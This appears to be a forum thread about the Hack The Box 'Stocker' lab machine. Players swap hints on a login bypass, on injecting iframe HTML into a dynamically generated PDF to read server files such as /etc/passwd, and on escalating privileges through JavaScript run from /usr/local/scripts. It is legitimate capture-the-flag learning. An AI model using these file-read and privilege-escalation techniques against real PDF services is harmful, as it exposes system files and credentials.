I can login…But I DON’T know how to exploit stock page and what type of info i am expecting.I used those payloads.It does not work
It is not a database leak, it is a system leak, search for lfi vulnerabilities 
How To perform lfi.I found it executes html code
EDIT: GOT it thank YOU
Make sure you update your /etc/hosts file. I’ve had to do this on most machines lately.
How?
open the pdf in text file and look for pdf generator version in the beginning…google the generator’s version for exploit
I meant that way you can only read contents of /etc/passwd but how do you privesc with this?
yep
dependency.yml
how did you figure out about index.js
I wrote an interesting script in python which fully automates LFI, if you guys found the way to read files i can share it with you just for education purposes
UPD: Rooted! Feel free to DM me for any help
someone else having trouble to open the redirect to stocker.htb ? The site wont open at all, either with vpn neither with pwnbox. Same Problem for “soccer” machine…
im having this problem as well. i cant see the whole of etc/passwd as well
EDIT: nevermind found a way. Look here for more info: XSS with Dynamic PDF | Exploit Notes
I got the login bypass, read through this whole thread, and got different takes, left and right.
One says to edit the “title” field within the intercepted request within BurpSuite and to insert the embedded payload (@socks) which, I take it, means the frame one. Another says to look at the PDF version (@MapleLeaf1998), and another still to “regenerate the receipt PDF as it pleases me” (@Paradise_R), WHAT?
I attempted ALL of these things as well as consulted the XSS with Dynamic PDF that @guruprk linked which is where I learned about the frame but I am still stuck. I’ve absolutely zero ideas on how to proceed. It’s either a SyntaxError, “success":true with the “orderId” and THAT’S IT. Then I read about the ones writing “EASY” or " Rooted in 15 mins, such an easy box!” 
I cant seem to figure out where to pass the payload. Do I pass it when pressing the Submit Purchase? passing payloads in burp just gets me a 200 page with “successs”:true and “orderId”. I can’t find anywhere that a payload would be passed when generating the pdf. Not sure where to go from here.
edit: ok I did the same thing as before but it seems to be working now. Now just need to figure out where to get a password. Also, if you add the tag
style=“height:1000px;width:100%;border:none;”
into your iframe, it will display the whole file in the pdf
just write some html code and see the output you will figure it out
Alright, will try that out, thanks!
Thanks for the heads up, I’ll test that out. What I did similarly to the code you wrote about the dimensions of the frame is that I included an opening and closing frame tag for the dimensions. The issue was where to put it! I tried inserting it into the title field as well as into the second pair of double quotes next to the title but nothing worked out. Will test more!
I meant the PDF is generated with user input, so you can alter it as much as you wish, as long as it doesn’t throw errors
I figured it out. The problem was that I was not copying the order id after the “/api/po/” to see the output with also the correct dimensions. It was literally in front of my eyes.
Im lost for root. I cant find any obvious privesc paths. I should be able to run javascript files in the /usr/local/scripts directory but I cant figure out that angle of attack. I can’t create or read any js files in that directory. Tips?